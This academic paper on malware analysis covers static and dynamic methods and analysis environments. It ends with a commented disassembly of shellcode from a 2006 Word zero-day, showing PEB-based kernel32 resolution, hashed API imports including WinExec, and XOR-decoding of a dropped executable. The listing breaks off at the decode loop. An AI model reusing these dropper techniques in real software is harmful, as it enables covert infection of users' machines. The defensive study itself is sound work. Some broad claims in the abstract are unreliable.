S. Murugan et al. / (IJAEST) INTERNATIONAL JOURNAL OF ADVANCED ENGINEERING SCIENCES AND TECHNOLOGIES Vol No. 2, Issue No. 1, 001 - 012
Malware Analysis Using Assembly Level Program

Dr. K. Kuppusamy
Associate Professor, Computer Science and Engg Dept, Alagappa University, Karaikudi, Tamilnadu, INDIA
kkdiksamy@yahoo.com

S. Murugan
ACTS Team Coordinator, CDAC Knowledge Park, No 1 Old Madras Road, Bangalore, Karnataka, INDIA
Murugan.sethu@gmail.com
Abstract- Malware are exciting types of programs to experiment with. One of the advantages of using assembly language is that you can both create and combat such programs. Generally, all effective malware is written in assembly language. It would be difficult, if not impossible, to do this with other languages (except for C), although it is quite easy to write a self-reproducing program in any language. Viruses have been used to kill other viruses. One could conceive of viruses and worms that run around through a system carrying out useful tasks without direct intervention of particular users. The ability to forensically analyze malicious software is becoming an increasingly important discipline in the field of Digital Forensics. This is because malware is becoming stealthier, targeted, profit driven, managed by criminal organizations, harder to detect and much harder to analyze. Malware analysis requires a considerable skill set to look deep into malware internals when the malware is designed specifically to detect and hold back such attempts. A wide range of tools is available to the analyst, including debuggers, disassemblers, de-compilers, memory dumpers and unpackers, as well as many other tools common to the discipline of software engineering. All of these tools require niche expertise and a thorough understanding of the principles of their operation and the computers they execute on.

1. INTRODUCTION

Malware, short for malicious software, is software designed to infiltrate a computer system without the owner's informed consent. The expression is a general term used by computer professionals to mean a variety of forms of hostile, intrusive, or annoying software or program code. The term "computer virus" is sometimes used as a catch-all phrase to include all types of malware, including true viruses.

Software is considered to be malware based on the perceived intent of the creator rather than any particular features. Malware includes computer viruses, worms, trojan horses, spyware, dishonest adware, crimeware, most rootkits, and other malicious and unwanted software. In law, malware is sometimes known as a computer contaminant, for instance in the legal codes of several U.S. states, including California and West Virginia. Malware is not the same as defective software, which is software that has a legitimate purpose but contains harmful bugs.

Preliminary results from Symantec published in 2008 suggested that "the release rate of malicious code and other unwanted programs may be exceeding that of legitimate software applications." According to F-Secure, "As much malware [was] produced in 2007 as in the previous 20 years altogether." Malware's most common pathway from criminals to users is through the Internet: primarily by e-mail and the World Wide Web.

The prevalence of malware as a vehicle for organized Internet crime, along with the general inability of traditional anti-malware protection platforms (products) to protect against the continuous stream of unique and newly produced malware, has seen the adoption of a new mindset
ISSN: 2230-7818
@ 2011 http://www.ijaest.iserp.org. All rights Reserved.
for businesses operating on the Internet: the acknowledgment that some sizable percentage of Internet customers will always be infected for some reason or another, and that they need to continue doing business with infected customers. The result is a greater emphasis on back-office systems designed to spot fraudulent activities associated with advanced malware operating on customers' computers.

On March 29, 2010, Symantec Corporation named Shaoxing, China as the world's malware capital.

Sometimes, malware is disguised as genuine software, and may come from an official site. Therefore, some security programs, such as McAfee, may call malware "potentially unwanted programs" or "PUP".

Many early infectious programs, including the first Internet Worm and a number of MS-DOS viruses, were written as experiments or pranks. They were generally intended to be harmless or merely annoying, rather than to cause serious damage to computer systems. In some cases, the perpetrators did not realize how much harm their creations would do.

Young programmers learning about viruses and their techniques wrote them simply to prove that they could, or to see how far they would spread. As late as 1999, widespread viruses such as the Melissa virus appear to have been written chiefly as pranks.

Hostile intent related to vandalism can be found in programs designed to cause harm or data loss. Many DOS viruses, and the Windows ExploreZip worm, were designed to destroy files on a hard disk, or to corrupt the file system by writing invalid data to it. Network-borne worms such as the 2001 Code Red worm or the Ramen worm fall into the same category. Designed to vandalize web pages, worms may seem like the online equivalent to graffiti tagging, with the author's alias or affinity group appearing everywhere the worm goes.

Another strictly for-profit category of malware has emerged in spyware: programs designed to monitor users' web browsing, display unsolicited advertisements, or redirect affiliate marketing revenues to the spyware creator. Spyware programs do not spread like viruses; they are, in general, installed by exploiting security holes or are packaged with user-installed software, such as peer-to-peer applications.

The best-known types of malware, viruses and worms, are known for the manner in which they spread, rather than any other particular behavior. The term computer virus is used for a program that has infected some executable software and that, when run, causes the virus to spread to other executables. Viruses may also contain a payload that performs other actions, often malicious. A worm, on the other hand, is a program that actively transmits itself over a network to infect other computers. It too may carry a payload. These definitions lead to the observation that a virus requires user intervention to spread, whereas a worm spreads itself automatically. Using this distinction, infections transmitted by email or Microsoft Word documents, which rely on the recipient opening a file or email to infect the system, would be classified as viruses rather than worms.

Before Internet access became widespread, viruses spread on personal computers by infecting the executable boot sectors of floppy disks. By inserting a copy of itself into the machine code instructions in these executables, a virus causes itself to be run whenever a program is run or the disk is booted. Early computer viruses were written for the Apple II and Macintosh, but they became more widespread with the dominance of the IBM PC and MS-DOS system. Executable-infecting viruses are dependent on users exchanging software or boot-able floppies, so they spread rapidly in computer hobbyist circles.

The first worms, network-borne infectious programs, originated not on personal computers, but on multitasking UNIX systems. The first well-known worm was the Internet Worm of 1988, which infected SunOS and VAX
BSD systems. Unlike a virus, this worm did not insert itself into other programs. Instead, it exploited security holes (vulnerabilities) in network server programs and started itself running as a separate process. This same behavior is used by today's worms as well.

With the rise of the Microsoft Windows platform in the 1990s, and the flexible macros of its applications, it became possible to write infectious code in the macro language of Microsoft Word and similar programs. These macro viruses infect documents and templates rather than applications (executables), but rely on the fact that macros in a Word document are a form of executable code.

Today, worms are most commonly written for the Windows OS, although a few like Mare-D and the Lion worm are also written for Linux and UNIX systems. Worms today work in the same basic way as 1988's Internet Worm: they scan the network and leverage vulnerable computers to replicate. Because they need no human intervention, worms can spread with incredible speed.

2. INTRODUCTION

Malware has been defined as "software whose intent is malicious, or whose effect is malicious". Analysis of malicious software is essential for computer security professionals and digital forensic analysts and is emerging as an important field of research. Malware is often targeted at organizations and is increasingly using anti-forensics techniques to prevent detection and analysis. Commercial Anti-Virus (AV) software is often limited in its ability to detect and remove malware. It is highly unlikely to detect new malware that is unleashed on the Internet or a corporate intranet, or malware that has been customized to target specific networks.

It is undeniable that there is a digital arms race between malware developers and malware researchers. As soon as a technique is developed by one side, the other side implements a countermeasure. Two of the major trends are that attackers are increasingly motivated by financial gain and that there are indications that malware development is becoming increasingly commercialized and carried out by professionals with extensive software engineering abilities. Another trend is that malware has an increasing variety of techniques available to hinder the forensic analyst. This can include detection of the tools used by the forensic analyst and prevention of analysis via anti-debugging, anti-disassembly, anti-emulation, anti-memory dumping, incorporation of fake signatures and code obfuscation.

Signature based detection of malware is dependent upon an analyst having already analyzed the malware and extracted a signature, as well as the end user having updated their malware signature file.

Although these techniques go some way in protecting a system, they are far from infallible and only of minor assistance to the forensic analyst, especially if the malware is new or has been customized. The increasing availability of high speed Internet connections has also enabled the rapid production and dissemination of malware. All of these factors are contributing to increasing numbers of network borne malware with respect to volume, variety and complexity. Security professionals in the field need to know how to determine if they are the target of an attack and how to eradicate or mitigate threats from their systems. This process of threat reduction can be assisted if security professionals have up to date methodologies and skill sets at their disposal.
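The weakness of signature based detection against customized malware, as described in this section, can be illustrated with a minimal sketch. It assumes, purely for illustration, that a signature is the SHA-256 digest of the whole file; real products use richer signatures, and the names `sha256_hex`, `is_known_malware` and the sample byte strings are hypothetical.

```python
import hashlib


def sha256_hex(data: bytes) -> str:
    """Return the SHA-256 digest of a byte string as hex text."""
    return hashlib.sha256(data).hexdigest()


def is_known_malware(data: bytes, signatures: set) -> bool:
    """Report a match only if the exact digest is already in the signature set."""
    return sha256_hex(data) in signatures


# Hypothetical sample that an analyst has already seen and fingerprinted.
original = b"hypothetical malicious payload"
signatures = {sha256_hex(original)}

# A customized variant: a single appended byte changes the whole digest.
customized = original + b"\x00"

print(is_known_malware(original, signatures))    # known sample matches
print(is_known_malware(customized, signatures))  # trivial variant does not
```

Under this assumption, any change to the file contents, however small, yields a different digest, which is why detection depends on an analyst having already processed that exact variant.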
3. THE PROBLEM WITH MALWARE ANALYSIS

The spectrum of malware that represents a real threat is expansive. A non exhaustive list includes root kits, worms, bots, trojans, logic bombs, viruses, phishing, spam, spyware, adware, key loggers and backdoors. No computing platform or environment is immune to these threats. Traditionally, malware is thought of as a virus or worm that has a single function or payload. The resulting countermeasure for traditional malware has been the employment of a removal tool that was initiated by signature detection or by recognition of heuristics defined by specific behaviors. These tended to be like the malware they were responding to in that they were unitary or singular in purpose.

Modern network borne malware is increasingly multi-partite in nature, incorporating several infection vectors and possible payloads in the one instance. Signature based systems that rely on file hashing or similar functions that uniquely identify malware based on file contents are increasingly failing due to the mass customization allowable with the use of frameworks. Furthermore, anti-forensic techniques are widely deployed to obfuscate infection, hinder detection and retard eventual removal of the malware. This increasing complexity and entropy makes modern malware analysis a significant undertaking that takes considerable time and expertise and requires an extensive knowledge domain, either in an individual or in coverage provided by a team of analysts.

Two fundamental techniques available to the analyst are static and dynamic analysis. Static analysis does not execute the code; the code is analyzed via disassemblies, call graphs, searches for strings, library calls, and reconstruction of data structures, enumerations and unions within the code. This analysis technique is very time consuming and easily hindered by anti-forensics in the form of code obfuscation, packers and protectors, which are increasingly being used by malware authors.

Dynamic analysis, in contrast, does run the code, and the analyst observes its behavior and interaction with the host and network via mechanisms such as registry, file and network monitoring tools. This technique is generally much easier to conduct than static analysis but is also easily hindered by malware that can detect the use of an emulation environment such as VMware or the use of debugging tools such as IDA Pro. By detecting the use of these tools and environments, the malware can change its behavior. Once it has detected them, the malware can decide not to run its true payload and can run in a deceptive mode that makes it look like much less of a threat.

It can delete itself together with any evidence or, if it is running with the appropriate privileges, damage or destroy the system that it is being run on or attached to. An effective analysis therefore uses an iterative and recursive technique that incorporates both static and dynamic analysis to extract the full functionality of the code, spiraling from the higher level view into the more detailed view. This technique also facilitates the opportunity to discover and mitigate anti forensic techniques as the analysis process proceeds.

4. ANALYSIS PROCESS

A high level and simplistic view of the malware analysis process is depicted in figure 1 below. It shows malware as one of two inputs to the analysis methodology process, which produces a report as an output. The generated results also feed back into the analysis methodology via an assessment process which can be used to adjust the methodology dynamically, or as a process improvement mechanism. Legal and ethical constraints serve as a bounding constraint to the process.
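One of the static techniques named in Section 3, searching a binary for strings without executing it, can be sketched as follows. This is a minimal illustration rather than a forensic tool: the function name `extract_strings`, the minimum length of four characters and the sample bytes are assumptions made for the example. It looks for runs of printable ASCII and for the same characters stored as UTF-16LE, the encoding Windows uses for wide strings.

```python
import re


def extract_strings(data: bytes, min_len: int = 4) -> list:
    """Return printable ASCII runs, then UTF-16LE runs, found in a byte blob."""
    ascii_pat = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    utf16_pat = re.compile(rb"(?:[\x20-\x7e]\x00){%d,}" % min_len)
    found = [m.group().decode("ascii") for m in ascii_pat.finditer(data)]
    found += [m.group().decode("utf-16-le") for m in utf16_pat.finditer(data)]
    return found


# Hypothetical blob mixing binary noise, an ASCII name and a wide-character path.
blob = (
    b"\x01\x02kernel32.dll\x00\xff"
    + "c:\\~.exe".encode("utf-16-le")
    + b"\x00\x00\x03ab"
)

for text in extract_strings(blob):
    print(text)
```

Packed or encoded samples defeat this kind of search, which is one reason static analysis is usually combined with dynamic observation.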
Programming skills are vital for in depth analysis of malware. Systems level programming, high level languages, scripting and even assembly language programming are important skills required to understand how malware is implemented and how it takes advantage of vulnerabilities. They are also an important skill set for the development of customized tools and for scripting disassemblers and debuggers. The power of being able to script debuggers and disassemblers should not be underestimated in a malware analysis context. Many analysis tools now also allow additional functionality to be added by allowing users to write customized Dynamic Link Library (DLL) plugins or to use scripting languages such as IDA Python, which integrates IDA Pro scripting with the Python scripting language.

Producers of malware also develop and utilize advanced programming techniques and technologies such as distributed computing to gain a competitive advantage over detection software and techniques. Therefore, it is imperative that a malware analyst also be well versed in cutting edge technologies and techniques.

5. MALWARE ANALYSIS

An adaptive, eclectic choice of techniques is required for analysis of malware. Various methodologies, such as static and dynamic analysis, and frameworks, such as PaiMei, exist for the malware analyst. Static analysis is the examination of source code logic and behaviors, whereas dynamic analysis is the monitoring and observation of the code as it executes. Both techniques have strengths. Obfuscation of code may render static analysis null and void. However, dynamic execution of that code segment may reveal the next code sections required for further static analysis. Other common software engineering techniques, such as profiling, tracing and debugging, are also available, applicable and have utility in malware analysis. The diversity of malware modus operandi requires a range of approaches and techniques to perform successful dissection and analysis of the malware. The skills needed to perform competent analysis are profound, highly technical and are at the cutting edge of computer science.

A wide range of tools is available to the analyst, including debuggers, disassemblers, de-compilers, memory dumpers and unpackers, as well as many other tools common to the discipline of software engineering. All of these tools require niche expertise and a thorough understanding of the principles of their operation and the computers they execute on. However, whether or not the tools are forensically sound and their use acceptable in a court of law is a matter that needs to be seriously considered.

Some useful tools are available from hacking and software cracking sites that would not be considered forensically sound without considerable validation or black box testing. Such tools could contain trojans and could easily hide a malicious purpose. They may not be forensically acceptable without significant due diligence on the part of the person or organizations using these types of tools. Other software cracking or reverse engineering sites have scripts for debuggers that can be easily and readily examined. These scripts are useful to extract the known algorithm for dealing with particular packers or to mitigate particular anti-forensic techniques used by creators of such software.
Analysis of malware will typically require configuring a complete virtual environment suitable for it to run in, not only from an operating systems perspective, but also the inclusion of network infrastructure and services. Modern malware are increasingly network borne and network enabled. So it may be necessary to provide an environment in which the malware can utilize commonly used services such as a Domain Name System (DNS) server, a Simple Mail Transfer Protocol (SMTP) server or an Internet Relay Chat (IRC) server. Establishment of this style of environment allows the malware to initiate communications with these services, and so allows the dynamic capture of target data to assist in the dynamic analysis of malware.

This type of environment may be supported by a virtualized environment using commercial virtualization environments such as VMWare or Virtual PC.

It should be noted that because malware can contain the ability to detect these virtualized environments as a result of their hardware and software fingerprints, the ability to configure real systems and devices may need serious consideration. This will require the configuration of a particular computing host environment, or network device, or other system administrative tasks in order to achieve this. This type of environment would need strict control and isolation to prevent the spread of malware.

6. CODE

seg000:00000000 ;
seg000:00000000 ; +------------------------------------------------------------------------+
seg000:00000000 ; ¦ This file is generated by The Interactive Disassembler (IDA)           ¦
seg000:00000000 ; ¦ Copyright (c) 2006 by DataRescue sa/nv, <ida@datarescue.com>           ¦
seg000:00000000 ; +------------------------------------------------------------------------+
seg000:00000000 ;
seg000:00000000 ; File Name   : C:\Documents and Settings\Administrator\Desktop\PLANNING REPORT 5-16-2006.doc
seg000:00000000 ; Format      : Binary file
seg000:00000000 ; Base Address: 0000h Range: 0000h - 246F5h Loaded length: 246F5h
seg000:00000000 ;
seg000:00000000 ; Authors: Michael Ligh and Ryan Smith
seg000:00000000 ;
seg000:00000000 ; This is a commented disassembly of the Word 0-day released in
seg000:00000000 ; mid-late May 2006. This document does not describe the vulnerability
seg000:00000000 ; or malware that results from an infection.
seg000:00000000 ;
seg000:00000000
seg000:00000000 unicode         macro page,string,zero
seg000:00000000                 irpc c,<string>
seg000:00000000                 db '&c', page
seg000:00000000                 endm
seg000:00000000                 ifnb <zero>
seg000:00000000                 dw zero
seg000:00000000                 endif
seg000:00000000 endm
seg000:00000000
seg000:00000000                 .686p
seg000:00000000                 .mmx
seg000:00000000                 .model flat
seg000:00000000
seg000:00000000 ; ---------------------------------------------------------------------------
seg000:00000B2E
seg000:00000B2E ; The shellcode starts here. It uses Dino Dai Zovi's PEB resolution method
seg000:00000B2E ; to load the base address of kernel32.dll. This information will be
seg000:00000B2E ; used to locate the addresses of kernel32's exports (because they
seg000:00000B2E ; are offsets from the base address).
seg000:00000B2E
seg000:00000B2E                 nop
seg000:00000B2F                 nop
seg000:00000B30                 mov     eax, fs:off_30          ; load PEB address into eax
seg000:00000B36                 mov     eax, [eax+0Ch]
seg000:00000B39                 mov     esi, [eax+1Ch]
seg000:00000B3C                 lodsd
seg000:00000B3D                 mov     esi, [eax+8]            ; kernel32.dll entry point
seg000:00000B40                 jmp     loc_DAF
seg000:00000B40
seg000:00000B40 ; At this point, the code jumps to loc_DAF, which immediately calls sub_B45.
seg000:00000B40 ; In doing so, the call instruction sets EIP to 0x00000DB4 (offset in
seg000:00000B40 ; this file) and pushes it on the stack. Notably, the first
seg000:00000B40 ; instruction in sub_B45 is to pop this address into eax (see below)
seg000:00000B40
seg000:00000B45
seg000:00000B45 ; ¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦ S U B R O U T I N E ¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦
seg000:00000B45
seg000:00000B45 ; The first part of this code loads the address to which EIP points
seg000:00000B45 ; into the eax register. If you look at 0x00000DB4, there isn't much,
seg000:00000B45 ; but a dword (0A2000h) and three unicode strings of file names.
seg000:00000B45 ; The code uses the offset of these values from EIP to reference them and
seg000:00000B45 ; builds a structure with pointers to them. The same structure will be used
seg000:00000B45 ; to store addresses of all the kernel32 exports later. In the code
seg000:00000B45 ; below, edi contains a pointer to the first member of the structure.
seg000:00000B45
seg000:00000B45 sub_B45         proc near               ; CODE XREF: seg000:loc_DAFp
seg000:00000B45                 pop     eax
seg000:00000B46                 sub     esp, 200h
seg000:00000B4C                 mov     edi, esp
seg000:00000B4E                 mov     ebx, [eax]              ; [eax] == 0A2000h
seg000:00000B50                 mov     [edi+4], ebx
seg000:00000B53                 mov     [edi+SCRATCH.hKernel32], esi ; entry point of kernel32
seg000:00000B56                 add     eax, 4
seg000:00000B59                 mov     [edi+SCRATCH.String1], eax ; c:\~$
seg000:00000B5C                 add     eax, 0Ch
seg000:00000B5F                 mov     [edi+SCRATCH.String2], eax ; c:\~.exe
seg000:00000B62                 add     eax, 12h
seg000:00000B65                 mov     [edi+SCRATCH.String3], eax ; c:\~.exe
seg000:00000B6B                 push    edi                     ; saves the scratch pad for use within loc_BA1
seg000:00000B6C                 mov     edi, esp
seg000:00000B6E                 xor     edi, 0FFFFh
seg000:00000B74                 dec     edi
seg000:00000B75                 dec     edi
seg000:00000B76                 dec     edi
seg000:00000B77
seg000:00000B77 ; The next instructions search memory for the original Word document's
seg000:00000B77 ; own filename. The last mov (above) places the esp pointer into edi.
seg000:00000B77 ; The loop works by reading a dword from edi and comparing it to the
seg000:00000B77 ; unicode equivalent of "oc". If it matches then it begins to search
seg000:00000B77 ; for ".d" (which completes the ".doc" extension). Otherwise,
seg000:00000B77 ; it decrements edi and grabs another dword. When done, it jumps
seg000:00000B77 ; to loc_BA1.
seg000:00000B77
seg000:00000B77 loc_B77:                                ; CODE XREF: sub_B45+39j
seg000:00000B77                                         ; sub_B45+45j ...
seg000:00000B77                 dec     edi
seg000:00000B78                 cmp     dword ptr [edi], 63006Fh ; "oc"
seg000:00000B7E                 jnz     short loc_B77
seg000:00000B80                 dec     edi
seg000:00000B81                 dec     edi
seg000:00000B82                 dec     edi
seg000:00000B83                 dec     edi
seg000:00000B84                 cmp     dword ptr [edi], 64002Eh ; ".d"
seg000:00000B8A                 jnz     short loc_B77
seg000:00000B8C                 push    0C8h
seg000:00000B91                 pop     ecx
seg000:00000B92                 mov     esi, edi
seg000:00000B94
seg000:00000B94 loc_B94:                                ; CODE XREF: sub_B45+58j
seg000:00000B94                 dec     esi
seg000:00000B95                 cmp     dword ptr [esi], 5C003Ah
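The three dword constants compared in the search loops (63006Fh, 64002Eh and 5C003Ah) are pairs of UTF-16LE characters as they sit in little-endian memory. The sketch below decodes them and mimics the backward search in a simplified form. The helper names `dword_to_utf16` and `find_doc_path` and the sample buffer are hypothetical, and the sketch ignores the 0C8h iteration limit that the listing loads into ecx.

```python
import struct


def dword_to_utf16(value: int) -> str:
    """Decode a 32-bit constant as two UTF-16LE code units, as stored in x86 memory."""
    return struct.pack("<I", value).decode("utf-16-le")


def find_doc_path(memory: bytes):
    """Find the last UTF-16LE '.doc', then walk back to the ':\\' and the drive letter."""
    needle = ".doc".encode("utf-16-le")
    end = memory.rfind(needle)
    if end < 0:
        return None
    colon = memory.rfind(":\\".encode("utf-16-le"), 0, end)
    if colon < 2:
        return None
    start = colon - 2  # step back one UTF-16 code unit to the drive letter
    return memory[start:end + len(needle)].decode("utf-16-le")


for constant in (0x63006F, 0x64002E, 0x5C003A):
    print(hex(constant), repr(dword_to_utf16(constant)))

# Hypothetical memory region containing a wide-character document path.
region = b"\x00" * 7 + "C:\\docs\\report.doc".encode("utf-16-le") + b"\x00\x00junk"
print(find_doc_path(region))
```

The step back by two bytes corresponds to the two `dec esi` instructions at loc_BA1, which move the pointer from the colon to the drive letter before it is stored as the document file name.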
seg000:00000B9B                 jz      short loc_BA1           ; finished - jump to loc_BA1
seg000:00000B9D                 loop    loc_B94
seg000:00000B9F                 jmp     short loc_B77           ; failed - start over again from loc_B77
seg000:00000BA1 ; ---------------------------------------------------------------------------
seg000:00000BA1
seg000:00000BA1 ; This is the section that fills the shellcode's own structure
seg000:00000BA1 ; members with pointers to kernel32 exports. Once again, edi contains
seg000:00000BA1 ; the pointer to the structure's first member, so all [edi+xyz] are
seg000:00000BA1 ; references to the additional members. The loop here consists of
seg000:00000BA1 ; pushing two parameters on the stack - a dword hash of the function name
seg000:00000BA1 ; (probably hashed to obfuscate the functions it imports) and the
seg000:00000BA1 ; entry point for kernel32.dll. Each iteration calls resolve_func
seg000:00000BA1 ; for the actual work (see 0x00000D5B of this file). When complete,
seg000:00000BA1 ; the code knows exactly where to find all the system resources and
seg000:00000BA1 ; functions it needs.
seg000:00000BA1 ;
seg000:00000BA1 ; Note the xyz field in all the [edi+xyz] operands are natively
seg000:00000BA1 ; numerical. My co-worker Ryan reversed the resolve_func sub routine
seg000:00000BA1 ; and renamed them for readability.
seg000:00000BA1
seg000:00000BA1 loc_BA1:                                ; CODE XREF: sub_B45+56j
seg000:00000BA1                 dec     esi
seg000:00000BA2                 dec     esi
seg000:00000BA3                 pop     edi
seg000:00000BA4                 mov     [edi+SCRATCH.szDOCFILENAME], esi
seg000:00000BA7                 push    [edi+SCRATCH.hKernel32]
seg000:00000BAA                 push    0C0397ECh               ; GlobalAlloc
seg000:00000BAF                 call    resolve_func
seg000:00000BB4                 mov     [edi+SCRATCH.pGlobalAlloc], eax
seg000:00000BB7                 push    [edi+SCRATCH.hKernel32]
seg000:00000BBA                 push    7CB922F6h               ; GlobalFree
seg000:00000BBF                 call    resolve_func
seg000:00000BC4                 mov     [edi+SCRATCH.pGlobalFree], eax
seg000:00000BC7                 push    dword ptr [edi+8]
seg000:00000BCA                 push    7C0017BBh               ; CreateFileW
seg000:00000BCF                 call    resolve_func
seg000:00000BD4                 mov     [edi+SCRATCH.pCreateFileW], eax
seg000:00000BD7                 push    dword ptr [edi+8]
seg000:00000BDA                 push    0FFD97FBh               ; CloseHandle
seg000:00000BDF                 call    resolve_func
seg000:00000BE4                 mov     [edi+SCRATCH.pCloseHandle], eax
seg000:00000BE7                 push    dword ptr [edi+8]
seg000:00000BEA                 push    10FA6516h               ; ReadFile
seg000:00000BEF                 call    resolve_func
seg000:00000BF4                 mov     [edi+SCRATCH.pReadFile], eax
seg000:00000BF7                 push    dword ptr [edi+8]
seg000:00000BFA                 push    0E80A791Fh              ; WriteFile
seg000:00000BFF                 call    resolve_func
seg000:00000C04                 mov     [edi+SCRATCH.pWriteFile], eax
seg000:00000C07                 push    dword ptr [edi+8]
seg000:00000C0A                 push    0C2FFB03Bh              ; DeleteFileW
seg000:00000C0F                 call    resolve_func
seg000:00000C14                 mov     [edi+SCRATCH.pDeleteFileW], eax
seg000:00000C17                 push    dword ptr [edi+8]
seg000:00000C1A                 push    76DA08ACh               ; SetFilePointer
seg000:00000C1F                 call    resolve_func
seg000:00000C24                 mov     [edi+SCRATCH.pSetFilePointer], eax
seg000:00000C27                 push    dword ptr [edi+8]
seg000:00000C2A                 push    0E8AFE98h               ; WinExec
seg000:00000C2F                 call    resolve_func
seg000:00000C34                 mov     [edi+SCRATCH.pWinExec], eax
seg000:00000C37                 push    dword ptr [edi+8]
seg000:00000C3A                 push    99EC8974h               ; CopyFileW
seg000:00000C3F                 call    resolve_func
seg000:00000C44                 mov     [edi+SCRATCH.pCopyFileW], eax
seg000:00000C47                 push    dword ptr [edi+8]
seg000:00000C4A                 push    73E2D87Eh               ; ExitProcess
seg000:00000C4F                 call    resolve_func
seg000:00000C54                 mov     [edi+SCRATCH.pExitProcess], eax
seg000:00000C54
seg000:00000C54 ; Delete any previously existing files of the same name. Recall these are
seg000:00000C54 ; two of the three unicode file names discussed earlier.
seg000:00000C54
seg000:00000C57                 push    [edi+SCRATCH.String2]   ; c:\~.exe
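The body of resolve_func is not shown in this part of the listing, so the hashing scheme behind the pushed constants is not stated. As an assumption for illustration only, the sketch below uses the rotate-right-by-13 additive hash that is common in Windows shellcode; it reproduces the constant 0E8AFE98h that the listing pairs with WinExec. The function names and the sample export list are hypothetical.

```python
def ror32(value: int, count: int) -> int:
    """Rotate a 32-bit value right by count bits."""
    value &= 0xFFFFFFFF
    return ((value >> count) | (value << (32 - count))) & 0xFFFFFFFF


def ror13_hash(name: str) -> int:
    """Assumed scheme: rotate the running hash right by 13, then add each character."""
    result = 0
    for byte in name.encode("ascii"):
        result = (ror32(result, 13) + byte) & 0xFFFFFFFF
    return result


def resolve_by_hash(export_names, wanted: int):
    """Return the first export name whose hash equals the wanted constant, else None."""
    for name in export_names:
        if ror13_hash(name) == wanted:
            return name
    return None


# Hypothetical subset of kernel32 export names to search.
exports = ["CloseHandle", "ReadFile", "WinExec", "ExitProcess"]
print(hex(ror13_hash("WinExec")))
print(resolve_by_hash(exports, 0x0E8AFE98))
```

An analyst can use the same idea in reverse: hashing every export name of a DLL and matching the results against the constants in the code recovers the import names without running the sample.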
seg000:00000C5A                 call    [edi+SCRATCH.pDeleteFileW]
seg000:00000C5D                 push    [edi+SCRATCH.String1]   ; c:\~$
seg000:00000C60                 call    [edi+SCRATCH.pDeleteFileW]
seg000:00000C63
seg000:00000C63 ; The next 3 push instructions are preparing the arguments for CopyFile.
seg000:00000C63 ; Top down, they are 0 (for overwriting permission), destination
seg000:00000C63 ; file name, and source file name (derived by the code's memory searching
seg000:00000C63 ; technique).
seg000:00000C63
seg000:00000C63                 push    0
seg000:00000C65                 push    [edi+SCRATCH.String1]   ; c:\~$
seg000:00000C68                 push    [edi+SCRATCH.szDOCFILENAME]
seg000:00000C6B                 call    [edi+SCRATCH.pCopyFileW]
seg000:00000C6E
seg000:00000C6E ; The next 7 push instructions are preparing the arguments for CreateFile.
seg000:00000C6E ; Despite the function name, this only opens an already existing file (in
seg000:00000C6E ; particular an exact copy of the original Word document now at c:\~$ after
seg000:00000C6E ; CopyFile).
seg000:00000C6E
seg000:00000C6E                 push    0
seg000:00000C70                 push    80h
seg000:00000C75                 push    3
seg000:00000C77                 push    0
seg000:00000C79                 push    0
seg000:00000C7B                 push    80000000h
seg000:00000C80                 push    [edi+SCRATCH.String1]   ; c:\~$
seg000:00000C83                 call    [edi+SCRATCH.pCreateFileW]
seg000:00000C86                 mov     [edi+SCRATCH.hInputFile], eax
seg000:00000C86
seg000:00000C86 ; This is where it gets a little interesting. The code places its read
seg000:00000C86 ; pointer at EOF and moves -4 bytes (back toward the beginning). This
seg000:00000C86 ; is the offset to where the output file begins. It reads data into
seg000:00000C86 ; a buffer, makes a call to allocate storage on the heap, then resets the
seg000:00000C86 ; read pointer and does a second iteration with different offsets. Once it
seg000:00000C86 ; has collected all the data, it proceeds to loc_CEA for processing.
seg000:00000C86
seg000:00000C89                 push    FILE_END
seg000:00000C8B                 push    0
seg000:00000C8D                 push    -4
seg000:00000C8F                 push    [edi+SCRATCH.hInputFile]
seg000:00000C92                 call    [edi+SCRATCH.pSetFilePointer]
seg000:00000C95                 push    0
seg000:00000C97                 lea     ebx, [edi+SCRATCH.endMarker]
seg000:00000C9D                 push    ebx
seg000:00000C9E                 push    4
seg000:00000CA0                 lea     ebx, [edi+SCRATCH.field_4]
seg000:00000CA3                 push    ebx
seg000:00000CA4                 push    [edi+SCRATCH.hInputFile] ; handle to c:\~$
seg000:00000CA7                 call    [edi+SCRATCH.pReadFile]
seg000:00000CAA                 push    [edi+SCRATCH.field_4]
seg000:00000CAD                 push    40h ; '@'               ; allocate 40 bytes on heap
seg000:00000CAF                 call    [edi+SCRATCH.pGlobalAlloc]
seg000:00000CB2                 mov     [edi+SCRATCH.pMallocdBuff0], eax
seg000:00000CB5                 mov     ebx, [edi+SCRATCH.field_4]
seg000:00000CB8                 add     ebx, 4
seg000:00000CBB                 not     ebx
seg000:00000CBD                 inc     ebx
seg000:00000CBE                 push    2                       ; new offsets and starting loc
seg000:00000CC0                 push    0
seg000:00000CC2                 push    ebx
seg000:00000CC3                 push    [edi+SCRATCH.hInputFile]
seg000:00000CC6                 call    [edi+SCRATCH.pSetFilePointer]
seg000:00000CC9                 push    0
seg000:00000CCB                 lea     ebx, [edi+SCRATCH.endMarker]
seg000:00000CD1                 push    ebx
seg000:00000CD2                 push    [edi+SCRATCH.field_4]
seg000:00000CD5                 push    [edi+SCRATCH.pMallocdBuff0]
seg000:00000CD8                 push    [edi+SCRATCH.hInputFile]
seg000:00000CDB                 call    [edi+SCRATCH.pReadFile]
seg000:00000CDE                 push    [edi+SCRATCH.hInputFile]
seg000:00000CE1                 call    [edi+SCRATCH.pCloseHandle]
seg000:00000CE4                 mov     eax, [edi+SCRATCH.field_4]
seg000:00000CE7                 mov     ebx, [edi+SCRATCH.pMallocdBuff0]
seg000:00000CEA
seg000:00000CEA ; This section of code loops through all bytes in the buffer filled by the
seg000:00000CEA ; previous ReadFile() functions and xor's them with 0x81. In the instructions,
seg000:00000CEA ; ebx is the array index and eax is the counter. This xor-encoding
Page 9
S. Murugan et al. / (IJAEST) INTERNATIONAL JOURNAL OF ADVANCED ENGINEERING SCIENCES AND TECHNOLOGIES Vol No. 2, Issue No. 1, 001 - 012
seg000:00000CEA
; scheme obfuscates the code and could help
evade IDS detection in seg000:00000CEA
; some cases.
seg000:00000CEA
seg000:00000CEA loc_CEA: ; CODE XREF: sub_B45+1ADj
seg000:00000CEA  xor   byte ptr [ebx], 81h ; The output file is static xor'd with 0x81
seg000:00000CED  inc   ebx
seg000:00000CEE  dec   eax
seg000:00000CEF  cmp   eax, 0
seg000:00000CF2  jnz   short loc_CEA
